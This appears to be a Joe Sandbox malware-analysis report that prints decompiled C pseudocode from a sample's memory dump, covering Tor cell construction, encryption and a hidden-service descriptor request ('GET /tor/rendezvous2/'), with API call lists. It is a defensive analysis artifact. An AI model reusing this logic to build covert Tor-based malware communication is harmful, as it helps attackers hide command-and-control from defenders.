				void* _t123;

				_t53 =  *0x3e8538(0x400);
				_v8 = _t53;
				_v16 =  *0x3e8538(0x400);
				_t55 = _a8;
				_t90 = _t55 + 1;
				do {
					_t106 =  *_t55;
					_t55 = _t55 + 1;
				} while (_t106 != 0);
				_t57 = E003D463A(_a4, 0, _a8, _t55 - _t90);
				_t119 = _t118 + 0xc;
				if(_t57 == 0) {
					L7:
					_t111 = 0;
				} else {
					memset(_v8, 0, 0x400);
					_t120 = _t119 + 0xc;
					_v12 = _v12 & 0x00000000;
					while(1) {
						_t85 = _a4;
						_t62 = E003D48F6(_a4, 0,  &(_v8[_v12]), 1);
						_t120 = _t120 + 0xc;
						if(_t62 == 0) {
							goto L7;
						}
						if(strstr(_v8, 0x3e667c) != 0) {
							if(strstr(_v8, "200 OK") == 0) {
								goto L7;
							} else {
								if(strstr(_v8, "Content-Encoding: deflate") == 0) {
									_t112 = "Content-Length: ";
									if(strstr(_v8, _t112) == 0) {
										goto L7;
									} else {
										_v12 = _v12 & 0x00000000;
										sscanf( &((strstr(_v8, _t112))[0x10]), "%d\r\n",  &_v12);
										if(_v12 == 0) {
											goto L7;
										} else {
											_t113 = _a12;
											if(E003D48F6(_t85, 0, _t113, _v12) == 0) {
												goto L7;
											} else {
												 *((char*)(_v12 + _t113)) = 0;
												goto L26;
											}
										}
									}
								} else {
									memset( &_v72, 0, 0x38);
									_v72 = _v16;
									_v68 = 0;
									_v60 = _a12;
									_v56 = 0x400000;
									E003D2307( &_v72);
									_t87 = _a4;
									_t77 = E003D48F6(_a4, 0, _v16, 1);
									_t123 = _t120 + 0x18;
									while(_t77 != 0) {
										if(_v68 == 0) {
											_v72 = _v16;
											_v68 = 1;
										}
										_t78 = E003D238B( &_v72);
										if(_t78 == 1) {
											L21:
											 *((char*)(_v52 + _a12)) = 0;
											E003D255C( &_v72);
											L26:
											_t111 = 1;
										} else {
											if(_t78 != 0) {
												E003D255C( &_v72);
												goto L7;
											} else {
												_t82 = _a16;
												if(_t82 == 0 || _v64 < _t82) {
													_t77 = E003D48F6(_t87, 0, _v16, 1);
													_t123 = _t123 + 0xc;
													continue;
												} else {
													goto L21;
												}
											}
										}
										goto L27;
									}
									goto L7;
								}
							}
						} else {
							_v12 = _v12 + 1;
							if(_v12 < 0x400) {
								continue;
							} else {
								goto L7;
							}
						}
						goto L27;
					}
					goto L7;
				}
				L27:
				 *0x3e8540(_v16);
				 *0x3e8540(_v8);
				return _t111;
			}































    0x003d4bee
    0x003d4bf5
    0x003d4bff
    0x003d4c02
    0x003d4c06
    0x003d4c09
    0x003d4c09
    0x003d4c0b
    0x003d4c0c
    0x003d4c1b
    0x003d4c20
    0x003d4c25
    0x003d4c71
    0x003d4c71
    0x003d4c27
    0x003d4c2d
    0x003d4c38
    0x003d4c3b
    0x003d4c3f
    0x003d4c45
    0x003d4c4d
    0x003d4c52
    0x003d4c57
    0x00000000
    0x00000000
    0x003d4c67
    0x003d4c86
    0x00000000
    0x003d4c88
    0x003d4c96
    0x003d4d42
    0x003d4d51
    0x00000000
    0x003d4d57
    0x003d4d57
    0x003d4d70
    0x003d4d7d
    0x00000000
    0x003d4d83
    0x003d4d86
    0x003d4d96
    0x00000000
    0x003d4d9c
    0x003d4d9f
    0x00000000
    0x003d4d9f
    0x003d4d96
    0x003d4d7d
    0x003d4c9c
    0x003d4ca5
    0x003d4cb3
    0x003d4cb6
    0x003d4cb9
    0x003d4cbc
    0x003d4cc3
    0x003d4ccc
    0x003d4ccf
    0x003d4cd4
    0x003d4d18
    0x003d4cdd
    0x003d4ce2
    0x003d4ce5
    0x003d4ce5
    0x003d4cef
    0x003d4cf7
    0x003d4d2e
    0x003d4d37
    0x003d4d3b
    0x003d4da3
    0x003d4da5
    0x003d4cf9
    0x003d4cfb
    0x003d4d24
    0x00000000
    0x003d4cfd
    0x003d4cfd
    0x003d4d02
    0x003d4d10
    0x003d4d15
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x003d4d02
    0x003d4cfb
    0x00000000
    0x003d4cf7
    0x00000000
    0x003d4d1c
    0x003d4c96
    0x003d4c69
    0x003d4c69
    0x003d4c6f
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x003d4c6f
    0x00000000
    0x003d4c67
    0x00000000
    0x003d4c3f
    0x003d4da6
    0x003d4da9
    0x003d4db2
    0x003d4dc0

    APIs
      • Part of subcall function 003D463A: memset.MSVCRT ref: 003D46EE
      • Part of subcall function 003D463A: htons.WS2_32(?), ref: 003D4701
      • Part of subcall function 003D463A: htons.WS2_32( L=), ref: 003D472A
      • Part of subcall function 003D463A: memcpy.MSVCRT ref: 003D473E
      • Part of subcall function 003D463A: memset.MSVCRT ref: 003D481C
      • Part of subcall function 003D463A: memset.MSVCRT ref: 003D4845
      • Part of subcall function 003D463A: htons.WS2_32(?), ref: 003D487F
    • memset.MSVCRT ref: 003D4C2D
      • Part of subcall function 003D48F6: memcpy.MSVCRT ref: 003D4939
      • Part of subcall function 003D48F6: memcpy.MSVCRT ref: 003D4955
      • Part of subcall function 003D48F6: memcpy.MSVCRT ref: 003D4964
      • Part of subcall function 003D48F6: memcpy.MSVCRT ref: 003D497C
      • Part of subcall function 003D48F6: htons.WS2_32(?), ref: 003D4B37
      • Part of subcall function 003D48F6: memcpy.MSVCRT ref: 003D4B5F
      • Part of subcall function 003D48F6: memcpy.MSVCRT ref: 003D4B75
      • Part of subcall function 003D48F6: memcpy.MSVCRT ref: 003D4B9A
    • strstr.MSVCRT ref: 003D4C61
    • strstr.MSVCRT ref: 003D4C80
    • strstr.MSVCRT ref: 003D4C90
    • memset.MSVCRT ref: 003D4CA5
      • Part of subcall function 003D238B: memcpy.MSVCRT ref: 003D2415
      • Part of subcall function 003D238B: memcpy.MSVCRT ref: 003D24E1
    • strstr.MSVCRT ref: 003D4D4B
    • strstr.MSVCRT ref: 003D4D68
    • sscanf.MSVCRT ref: 003D4D70
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003D463A, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 234network
    C-Code - Quality: 32%
    			E003D463A(intOrPtr* __ebx, void* _a4, void* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				void* _v16;
				void* _v20;
				signed int _v24;
				intOrPtr _v28;
				signed int _v32;
				intOrPtr _v36;
				void _v56;
				void _v172;
				intOrPtr _t99;
				void* _t103;
				void* _t104;
				signed int _t106;
				signed int _t107;
				void* _t125;
				signed int _t128;
				void* _t129;
				signed int _t132;
				signed int _t133;
				void* _t140;
				void* _t144;
				intOrPtr* _t148;
				signed int _t156;
				signed int* _t163;
				signed int _t164;
				signed int _t166;
				signed int _t170;
				void* _t178;
				void* _t185;
				intOrPtr _t192;
				void* _t194;
				void* _t195;
				int _t196;
				void* _t198;
				void* _t200;
				void* _t201;
				void* _t202;
				void* _t204;
				void* _t205;
				void* _t206;
				void* _t207;

				_t148 = __ebx;
				_t178 =  *0x3e8538(0x200);
				_v16 = _t178;
				_v8 =  *0x3e8538(0x200);
				_v24 = _v24 & 0x00000000;
				_v32 = _v32 & 0x00000000;
				_t99 = _a12 / 0x1f2 + 1;
				_v36 = _t99;
				if(_t99 == 0) {
					L24:
					 *0x3e8540(_t178);
					 *0x3e8540(_v8);
					_t103 = 1;
				} else {
					_t104 = _a8;
					_v28 = 0x1f2;
					_v28 = _v28 - _t104;
					_v20 = _t104;
					do {
						_t19 =  &_a4; // 0x3d4c20
						_t192 =  *_t19;
						if(_t192 == 0) {
							L9:
							memset(_t178, 0, 0x1fd);
							 *_t178 = 2;
							_t106 =  *(_t148 + 0x138) & 0x0000ffff;
							_t201 = _t200 + 0xc;
							__imp__#9(_t106);
							 *(_t178 + 3) = _t106;
							_t107 = _a12;
							if(_v20 + _v28 >= _t107) {
								_t107 = _t107 - _v24;
								_v12 = _t107;
							} else {
								_v12 = 0x1f2;
							}
							_t38 =  &_v12; // 0x3d4c20
							__imp__#9( *_t38);
							 *(_t178 + 9) = _t107;
							_t42 = _t178 + 0xb; // 0xb
							memcpy(_t42, _v20, _v12);
							_t202 = _t201 + 0xc;
							_push(0x1fd);
							_push(_t178);
							if(_a4 == 0) {
								 *0x3e899c(_t148 + 8);
								_t194 = _t148 + 8;
							} else {
								 *0x3e899c(_a4);
								_t194 = _a4;
							}
							_t156 = 0x1d;
							memcpy( &_v172, _t194, _t156 << 2);
							_t195 =  *0x3e8538(0x14);
							_v12 = _t195;
							 *0x3e8ab0( &_v172, _t195);
							memcpy( &_v56, _t195, 0 << 2);
							_t204 = _t202 + 0x18;
							 *0x3e8540(_v12, 5);
							_t185 = _a4;
							_t118 = _v16;
							 *((intOrPtr*)(_v16 + 5)) = _v56;
							if(_t185 == 0) {
								_t196 = 0x200;
								memset(_v8, 0, 0x200);
								_t125 = E003D3BB7(_t148 + 0xf0, _v16, 0x1fd, _v8 + 3, _t148 + 0x110, _t148 + 0x120);
								_t205 = _t204 + 0x24;
								if(_t125 == 0) {
									goto L26;
								} else {
									goto L20;
								}
							} else {
								_t59 = _t185 + 0x118; // 0x118
								_t60 = _t185 + 0x108; // 0x108
								_t140 = E003D3BB7(_t185 + 0xe8, _t118, 0x1fd, _v8, _t60, _t59);
								_t206 = _t204 + 0x18;
								if(_t140 == 0) {
									L26:
									_t178 = _v16;
									goto L27;
								} else {
									_t144 = E003D3BB7(_t148 + 0xf0, _v8, 0x1fd, _v16, _t148 + 0x110, _t148 + 0x120);
									_t207 = _t206 + 0x18;
									if(_t144 == 0) {
										goto L26;
									} else {
										_t198 = _v8;
										memset(_t198, 0, 0x200);
										_t170 = 0x7f;
										memcpy(_t198 + 3, _v16, _t170 << 2);
										_t205 = _t207 + 0x18;
										asm("movsb");
										_t185 = _a4;
										_t196 = 0x200;
										L20:
										_t128 =  *(_t148 + 4) & 0x0000ffff;
										__imp__#9(_t128);
										_t163 = _v8;
										 *_t163 = _t128;
										_t163[0] = 3;
										_t129 = E003DFD0B( *_t148, _t163, _t196);
										_t200 = _t205 + 0xc;
										if(_t129 != _t196) {
											goto L26;
										} else {
											goto L21;
										}
									}
								}
							}
						} else {
							_t132 =  *(_t192 + 0x134);
							if(_t132 < 0x3e8) {
								L6:
								_t133 =  *(_t192 + 0x134);
								if(_t133 < 0x1f4) {
									goto L9;
								} else {
									_t164 = 0x32;
									if(_t133 % _t164 != 0 || E003D4573(_t148, _t192) != 0) {
										goto L9;
									} else {
										goto L27;
									}
								}
							} else {
								_t166 = 0x64;
								if(_t132 % _t166 != 0 || E003D4573(_t148, _t192) != 0) {
									goto L6;
								} else {
									L27:
									 *0x3e8540(_t178);
									 *0x3e8540(_v8);
									_t103 = 0;
								}
							}
						}
						goto L25;
						L21:
						_v24 = _v24 + 0x1f2;
						_v20 = _v20 + 0x1f2;
						if(_t185 != 0) {
							 *((intOrPtr*)(_t185 + 0x134)) =  *((intOrPtr*)(_t185 + 0x134)) + 1;
						}
						_v32 = _v32 + 1;
						_t178 = _v16;
					} while (_v32 < _v36);
					goto L24;
				}
				L25:
				return _t103;
			}













































    0x003d463a
    0x003d4651
    0x003d4654
    0x003d465f
    0x003d466e
    0x003d4672
    0x003d4676
    0x003d4677
    0x003d467a
    0x003d48c6
    0x003d48c7
    0x003d48d0
    0x003d48d8
    0x003d4680
    0x003d4680
    0x003d4683
    0x003d4686
    0x003d4689
    0x003d468c
    0x003d468c
    0x003d468c
    0x003d4691
    0x003d46e5
    0x003d46ee
    0x003d46f3
    0x003d46f6
    0x003d46fd
    0x003d4701
    0x003d470d
    0x003d4711
    0x003d4716
    0x003d4721
    0x003d4724
    0x003d4718
    0x003d4718
    0x003d4718
    0x003d4727
    0x003d472a
    0x003d4733
    0x003d473a
    0x003d473e
    0x003d4743
    0x003d474a
    0x003d474b
    0x003d474c
    0x003d4760
    0x003d4766
    0x003d474e
    0x003d4751
    0x003d4757
    0x003d4757
    0x003d476b
    0x003d4774
    0x003d477c
    0x003d4787
    0x003d478a
    0x003d4799
    0x003d4799
    0x003d479b
    0x003d47a1
    0x003d47a4
    0x003d47ab
    0x003d47b0
    0x003d483a
    0x003d4845
    0x003d486e
    0x003d4873
    0x003d4878
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x003d47b6
    0x003d47b6
    0x003d47bd
    0x003d47d5
    0x003d47da
    0x003d47df
    0x003d48df
    0x003d48df
    0x00000000
    0x003d47e5
    0x003d4801
    0x003d4806
    0x003d480b
    0x00000000
    0x003d4811
    0x003d4811
    0x003d481c
    0x003d482c
    0x003d482d
    0x003d482d
    0x003d482f
    0x003d4830
    0x003d4833
    0x003d487a
    0x003d487a
    0x003d487f
    0x003d4885
    0x003d488a
    0x003d488d
    0x003d4893
    0x003d4898
    0x003d489d
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x003d489d
    0x003d480b
    0x003d47df
    0x003d4693
    0x003d4693
    0x003d469e
    0x003d46bc
    0x003d46bc
    0x003d46c7
    0x00000000
    0x003d46c9
    0x003d46cd
    0x003d46d2
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x003d46d2
    0x003d46a0
    0x003d46a4
    0x003d46a9
    0x00000000
    0x003d48e2
    0x003d48e2
    0x003d48e3
    0x003d48ec
    0x003d48f2
    0x003d48f2
    0x003d46a9
    0x003d469e
    0x00000000
    0x003d489f
    0x003d48a4
    0x003d48a7
    0x003d48ac
    0x003d48ae
    0x003d48ae
    0x003d48b4
    0x003d48ba
    0x003d48bd
    0x00000000
    0x003d468c
    0x003d48d9
    0x003d48de

    APIs
    • memset.MSVCRT ref: 003D46EE
    • htons.WS2_32(?), ref: 003D4701
    • htons.WS2_32( L=), ref: 003D472A
    • memcpy.MSVCRT ref: 003D473E
    • memset.MSVCRT ref: 003D481C
    • memset.MSVCRT ref: 003D4845
      • Part of subcall function 003D3BB7: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,?,000001FD,?,?,?,?,00000000,00000200), ref: 003D3BCF
      • Part of subcall function 003D3BB7: CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,?,?,00000020), ref: 003D3C60
      • Part of subcall function 003D3BB7: CryptDestroyKey.ADVAPI32(?), ref: 003D3C71
      • Part of subcall function 003D3BB7: CryptImportKey.ADVAPI32(?,00000000,0000001C,00000000,00000000,?), ref: 003D3D87
      • Part of subcall function 003D3BB7: CryptReleaseContext.ADVAPI32(?,00000000), ref: 003D3DD2
      • Part of subcall function 003D3BB7: CryptDestroyKey.ADVAPI32(?), ref: 003D3DF2
      • Part of subcall function 003D3BB7: CryptReleaseContext.ADVAPI32(?,00000000), ref: 003D3DFD
    • htons.WS2_32(?), ref: 003D487F
      • Part of subcall function 003DFD0B: htons.WS2_32(?), ref: 003DFDE5
      • Part of subcall function 003DFD0B: memcpy.MSVCRT ref: 003DFDF7
      • Part of subcall function 003DFD0B: memcpy.MSVCRT ref: 003DFE15
      • Part of subcall function 003DFD0B: memset.MSVCRT ref: 003DFE5E
      • Part of subcall function 003DFD0B: htons.WS2_32(00000301), ref: 003DFEB9
      • Part of subcall function 003DFD0B: htons.WS2_32(?), ref: 003DFEC2
      • Part of subcall function 003DFD0B: send.WS2_32(?,?,?,00000000), ref: 003DFED4
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003D5C47, Relevance: 16.2, APIs: 7, Strings: 2, Instructions: 401network
    C-Code - Quality: 43%
    			E003D5C47(void* __edx, void* __eflags, intOrPtr _a4) {
				char _v504;
				char _v512;
				char _v532;
				int _v1364;
				void* _v2164;
				char _v2180;
				char _v2284;
				intOrPtr _v2316;
				void _v2400;
				void _v2420;
				char _v2424;
				char _v2440;
				char _v2456;
				intOrPtr _v2460;
				void _v2488;
				char _v2496;
				void _v2508;
				intOrPtr _v2516;
				char _v2528;
				char _v2532;
				intOrPtr _v2540;
				char _v2544;
				void _v2552;
				void* _v2556;
				signed int _v2560;
				intOrPtr _v2564;
				char* _v2568;
				void* _v2572;
				char* _v2576;
				intOrPtr _v2580;
				void* _v2584;
				signed int _v2588;
				void* _v2592;
				void* _v2596;
				char _v2600;
				intOrPtr _v2604;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t129;
				signed int _t132;
				intOrPtr _t133;
				intOrPtr _t134;
				void* _t135;
				char* _t136;
				void* _t150;
				void* _t156;
				char _t160;
				void* _t161;
				intOrPtr* _t167;
				int _t171;
				int _t175;
				signed int _t176;
				int _t188;
				int _t189;
				int _t194;
				int _t195;
				void* _t197;
				intOrPtr _t203;
				int _t207;
				int _t213;
				int _t222;
				int _t226;
				int _t232;
				int _t234;
				void* _t245;
				void* _t249;
				void* _t251;
				void* _t257;
				void* _t271;
				signed int _t272;
				void* _t278;
				void* _t279;
				void* _t281;
				signed int _t285;
				signed int _t288;
				int _t310;
				signed int _t312;
				void* _t313;
				intOrPtr _t318;
				int _t323;
				char* _t337;
				void* _t338;
				intOrPtr _t342;
				intOrPtr* _t347;
				int _t349;
				int _t350;
				int _t353;
				intOrPtr* _t358;
				signed int _t359;
				void* _t362;
				void* _t363;
				void* _t364;
				void* _t365;
				void* _t366;

				_t129 =  *0x3e8538(0x470, _t313, _t338, _t245);
				_v2572 = _t129;
				memset(_t129, 0, 0x470);
				_t362 = (_t359 & 0xfffffff8) - 0xa14 + 0xc;
				_v2552 =  *0x3e8538(0x200);
				_v2600 = 0x10000;
				_t132 =  *0x3e8538();
				_v2560 = _t132;
				_t133 =  *0x3e8538(0x1000);
				_v2580 = _t133;
				_t134 =  *0x3e8538(0x1000);
				_v2540 = _t134;
				_t135 =  *0x3e8538(0x28);
				_v2556 = _t135;
				_t136 =  *0x3e8538();
				_t257 = 0x80;
				_v2568 = _t136;
				if(E003D50D5(_a4,  &_v2440, E003DE937(_t257) & 1) == 0 || E003D39C0( &_v2528,  &_v2440) != 0x14) {
					L33:
					 *0x3e8540(_v2556);
					 *0x3e8540(_v2568);
					 *0x3e8540(_v2560);
					 *0x3e8540(_v2552);
					 *0x3e8540(_v2540);
					 *0x3e8540(_v2580);
					 *0x3e8540(_v2572);
					_t150 = 0;
				} else {
					_t156 = E003D51F8( &_v2284,  &_v2528);
					_t379 = _t156;
					if(_t156 == 0) {
						goto L33;
					} else {
						E003D3E17( &_v2164);
						_t160 = L003DF529(_t379,  &_v2284);
						_pop(_t271);
						_v2164 = _t160;
						_t380 = _t160;
						if(_t160 == 0) {
							goto L33;
						} else {
							_t161 = E003D4054( &_v2164, _t380);
							_t381 = _t161;
							if(_t161 == 0 || E003D3EE9( &_v2164, _t271, _t381) == 0) {
								_t342 = _v2164;
								goto L8;
							} else {
								_t167 = _v2164;
								_v2532 = 0x10;
								__imp__#5( *_t167,  &_v2508,  &_v2532);
								__imp__#12(_v2516);
								sprintf(_v2568, "GET /tor/rendezvous2/%s HTTP/1.0\r\nHost: %s\r\n\r\n",  &_v2456, _t167);
								_t171 = E003D4BDF( &_v2180, _v2568, _v2576, 0);
								_t342 = _v2180;
								_t363 = _t362 + 0x20;
								__eflags = _t171;
								if(_t171 != 0) {
									E003DFF10(_t342);
									_t175 = E003D528D( &_v532,  &_v2560, _v2576);
									_t364 = _t363 + 0xc;
									__eflags = _t175;
									if(_t175 == 0) {
										goto L33;
									} else {
										_t176 = E003DE937(_t271);
										_t272 = 8;
										_t310 = _t176 % _v2560 << 5;
										__eflags = _t310;
										memcpy( &_v2488, _t364 + _t310 + 0x820, _t272 << 2);
										_t365 = _t364 + 0xc;
										_t318 =  *0x3e8ac0; // 0x0
										do {
											_t312 = E003DE937(0) %  *0x3e8ac4;
											__eflags =  *((intOrPtr*)(_t312 * 0x74 + _t318 + 0x70)) - 1;
										} while (__eflags != 0);
										_push(0x1d);
										memcpy( &_v2420, _t312 * 0x74 + _t318, 0 << 2);
										_t366 = _t365 + 0xc;
										__eflags = E003D556B(0,  &_v2420, __eflags);
										if(__eflags == 0) {
											L30:
											_t323 = _v2560;
											__eflags = _t323;
											if(_t323 > 0) {
												_t347 =  &_v504;
												do {
													 *0x3e8540( *((intOrPtr*)(_t347 - 4)));
													 *0x3e8540( *_t347);
													_t347 = _t347 + 0x20;
													_t323 = _t323 - 1;
													__eflags = _t323;
												} while (_t323 != 0);
											}
											goto L33;
										} else {
											_t188 = L003DF529(__eflags,  &_v2420);
											_t324 = _v2588;
											_pop(_t278);
											 *_v2588 = _t188;
											__eflags = _t188;
											if(__eflags == 0) {
												goto L30;
											} else {
												_t189 = E003D4054(_t324, __eflags);
												__eflags = _t189;
												if(_t189 == 0) {
													L29:
													E003DFF10( *_t324);
													goto L30;
												} else {
													_t349 = 0;
													__eflags = 0;
													do {
														 *((char*)(_t366 + _t349 + 0x44)) = E003DE8E0();
														_t349 = _t349 + 1;
														__eflags = _t349 - 0x14;
													} while (__eflags < 0);
													_t194 = E003D56CF(_t324, _t278, __eflags,  &_v2544);
													_pop(_t279);
													__eflags = _t194;
													if(__eflags == 0) {
														goto L29;
													} else {
														_t195 = E003DF29F(_t279, __eflags, _v2572, _v2584);
														_pop(_t281);
														__eflags = _t195;
														if(_t195 == 0) {
															goto L29;
														} else {
															_t249 = _v2556;
															_t350 = E003D5853(_t281, _v2460, _t249);
															_v2552 = _t350;
															__eflags = _t350;
															if(__eflags == 0) {
																goto L29;
															} else {
																_t197 =  *0x3e8538(_t350);
																_v2592 = _t197;
																memcpy(_t197, _t249, _t350);
																E003D3B5C(_v2592, _t350,  &_v2508);
																_t285 = 5;
																memcpy(_v2596,  &_v2508, _t285 << 2);
																 *_t249 = 3;
																_t203 = E003D3B23(__eflags) + 0x96;
																__imp__#8(_t203);
																 *((intOrPtr*)(_t249 + 2)) = _t203;
																_t207 = E003DEA68( &_v2424,  &_v2568,  &_v2584);
																__eflags = _t207;
																if(_t207 == 0) {
																	L28:
																	 *0x3e8540(_v2596);
																	_t324 = _v2592;
																	goto L29;
																} else {
																	 *((intOrPtr*)(_t249 + 6)) = _v2568;
																	 *((short*)(_t249 + 0xa)) = _v2584;
																	_t288 = 5;
																	memcpy(_t249 + 0xc,  &_v2400, _t288 << 2);
																	_t213 = E003D5853(0, _v2316, _t249 + 0x22);
																	_t353 = _t213;
																	_v2568 = _t353;
																	__eflags = _t353;
																	if(_t353 == 0) {
																		goto L28;
																	} else {
																		__imp__#9(_t353);
																		 *(_t249 + 0x20) = _t213;
																		_push(5);
																		_v2588 = _v2588 & 0x00000000;
																		_t85 = _t249 + _t353 + 0x22; // 0x22
																		_push(0x20);
																		_t89 = memcpy(_t85,  &_v2552, 0 << 2) + 0x36; // 0x36
																		memcpy(_t89, _v2592, 0 << 2);
																		_t222 = E003D588E(_t249, _v2572 + 0xb6, _v2600, _v2560, _v2604 + 0x14,  &_v2588);
																		__eflags = _t222;
																		if(_t222 == 0) {
																			goto L28;
																		} else {
																			E003D3E17( &_v1364);
																			_t226 = L003DF529(__eflags,  &_v2496);
																			_v1364 = _t226;
																			__eflags = _t226;
																			if(__eflags == 0) {
																				goto L28;
																			} else {
																				__eflags = E003D4054( &_v1364, __eflags);
																				if(__eflags == 0) {
																					L27:
																					E003DFF10(_v1364);
																					goto L28;
																				} else {
																					_t232 = E003D5949( &_v1364, __eflags, _v2604, _v2588 + 0x14);
																					__eflags = _t232;
																					if(_t232 == 0) {
																						goto L27;
																					} else {
																						_t251 = _v2596;
																						_t234 = E003D5AAA(_t251, _v2580, _t251 + 0x338);
																						__eflags = _t234;
																						if(_t234 != 0) {
																							E003DFF10(_v1364);
																							 *0x3e8540(_v2600);
																							_t337 = _v2568;
																							__eflags = _t337;
																							if(_t337 > 0) {
																								_t358 =  &_v512;
																								do {
																									 *0x3e8540( *((intOrPtr*)(_t358 - 4)));
																									 *0x3e8540( *_t358);
																									_t358 = _t358 + 0x20;
																									_t337 = _t337 - 1;
																									__eflags = _t337;
																								} while (_t337 != 0);
																							}
																							 *0x3e8540(_v2580);
																							 *0x3e8540(_v2592);
																							 *0x3e8540(_v2584);
																							 *0x3e8540(_v2576);
																							 *0x3e8540(_v2564);
																							 *0x3e8540(_v2604);
																							_t150 = _t251;
																						} else {
																							goto L27;
																						}
																					}
																				}
																			}
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								} else {
									L8:
									E003DFF10(_t342);
									goto L33;
								}
							}
						}
					}
				}
				return _t150;
			}


































































































    0x003d5c5c
    0x003d5c67
    0x003d5c6b
    0x003d5c70
    0x003d5c7e
    0x003d5c82
    0x003d5c89
    0x003d5c96
    0x003d5c9a
    0x003d5ca2
    0x003d5ca6
    0x003d5caf
    0x003d5cb3
    0x003d5cbf
    0x003d5cc3
    0x003d5cc9
    0x003d5cca
    0x003d5ced
    0x003d60b5
    0x003d60b9
    0x003d60c4
    0x003d60cf
    0x003d60da
    0x003d60e5
    0x003d60f0
    0x003d60fb
    0x003d6101
    0x003d5d10
    0x003d5d1d
    0x003d5d24
    0x003d5d26
    0x00000000
    0x003d5d2c
    0x003d5d33
    0x003d5d40
    0x003d5d45
    0x003d5d46
    0x003d5d4d
    0x003d5d4f
    0x00000000
    0x003d5d55
    0x003d5d5c
    0x003d5d61
    0x003d5d63
    0x003d5d70
    0x00000000
    0x003d5d79
    0x003d5d83
    0x003d5d8a
    0x003d5d94
    0x003d5d9e
    0x003d5db6
    0x003d5dce
    0x003d5dd3
    0x003d5dda
    0x003d5ddd
    0x003d5ddf
    0x003d5deb
    0x003d5e01
    0x003d5e06
    0x003d5e09
    0x003d5e0b
    0x00000000
    0x003d5e11
    0x003d5e11
    0x003d5e1e
    0x003d5e23
    0x003d5e23
    0x003d5e2d
    0x003d5e2d
    0x003d5e2f
    0x003d5e35
    0x003d5e3c
    0x003d5e47
    0x003d5e47
    0x003d5e55
    0x003d5e5f
    0x003d5e5f
    0x003d5e6d
    0x003d5e6f
    0x003d608d
    0x003d608d
    0x003d6091
    0x003d6093
    0x003d6095
    0x003d609c
    0x003d609f
    0x003d60a8
    0x003d60ae
    0x003d60b1
    0x003d60b1
    0x003d60b2
    0x003d609c
    0x00000000
    0x003d5e75
    0x003d5e78
    0x003d5e7d
    0x003d5e81
    0x003d5e82
    0x003d5e84
    0x003d5e86
    0x00000000
    0x003d5e8c
    0x003d5e8e
    0x003d5e93
    0x003d5e95
    0x003d6086
    0x003d6088
    0x00000000
    0x003d5e9b
    0x003d5e9b
    0x003d5e9b
    0x003d5e9d
    0x003d5ea2
    0x003d5ea6
    0x003d5ea7
    0x003d5ea7
    0x003d5eb3
    0x003d5eb8
    0x003d5eb9
    0x003d5ebb
    0x00000000
    0x003d5ec1
    0x003d5ec9
    0x003d5ecf
    0x003d5ed0
    0x003d5ed2
    0x00000000
    0x003d5ed8
    0x003d5ed8
    0x003d5ee9
    0x003d5eed
    0x003d5ef1
    0x003d5ef3
    0x00000000
    0x003d5ef9
    0x003d5efa
    0x003d5f04
    0x003d5f08
    0x003d5f1a
    0x003d5f28
    0x003d5f2d
    0x003d5f2f
    0x003d5f39
    0x003d5f3f
    0x003d5f45
    0x003d5f5a
    0x003d5f62
    0x003d5f64
    0x003d6077
    0x003d607b
    0x003d6081
    0x00000000
    0x003d5f6a
    0x003d5f6e
    0x003d5f76
    0x003d5f7c
    0x003d5f8b
    0x003d5f94
    0x003d5f99
    0x003d5f9d
    0x003d5fa1
    0x003d5fa3
    0x00000000
    0x003d5fa9
    0x003d5faa
    0x003d5fb0
    0x003d5fb4
    0x003d5fb6
    0x003d5fbf
    0x003d5fc2
    0x003d5fce
    0x003d5ff2
    0x003d5ff4
    0x003d5ffc
    0x003d5ffe
    0x00000000
    0x003d6000
    0x003d6007
    0x003d6011
    0x003d6017
    0x003d601e
    0x003d6020
    0x00000000
    0x003d6022
    0x003d602e
    0x003d6030
    0x003d606b
    0x003d6072
    0x00000000
    0x003d6032
    0x003d6040
    0x003d6047
    0x003d6049
    0x00000000
    0x003d604b
    0x003d604b
    0x003d605b
    0x003d6063
    0x003d6065
    0x003d610f
    0x003d6118
    0x003d611e
    0x003d6123
    0x003d6125
    0x003d6127
    0x003d612e
    0x003d6131
    0x003d613a
    0x003d6140
    0x003d6143
    0x003d6143
    0x003d6144
    0x003d612e
    0x003d614b
    0x003d6156
    0x003d6161
    0x003d616c
    0x003d6177
    0x003d6182
    0x003d6188
    0x00000000
    0x00000000
    0x00000000
    0x003d6065
    0x003d6049
    0x003d6030
    0x003d6020
    0x003d5ffe
    0x003d5fa3
    0x003d5f64
    0x003d5ef3
    0x003d5ed2
    0x003d5ebb
    0x003d5e95
    0x003d5e86
    0x003d5e6f
    0x003d5de1
    0x003d5de1
    0x003d5de1
    0x00000000
    0x003d5de1
    0x003d5ddf
    0x003d5d63
    0x003d5d4f
    0x003d5d26
    0x003d6191

    APIs
    • memset.MSVCRT ref: 003D5C6B
      • Part of subcall function 003D50D5: htonl.WS2_32(?), ref: 003D513C
      • Part of subcall function 003D39C0: memset.MSVCRT ref: 003D39EE
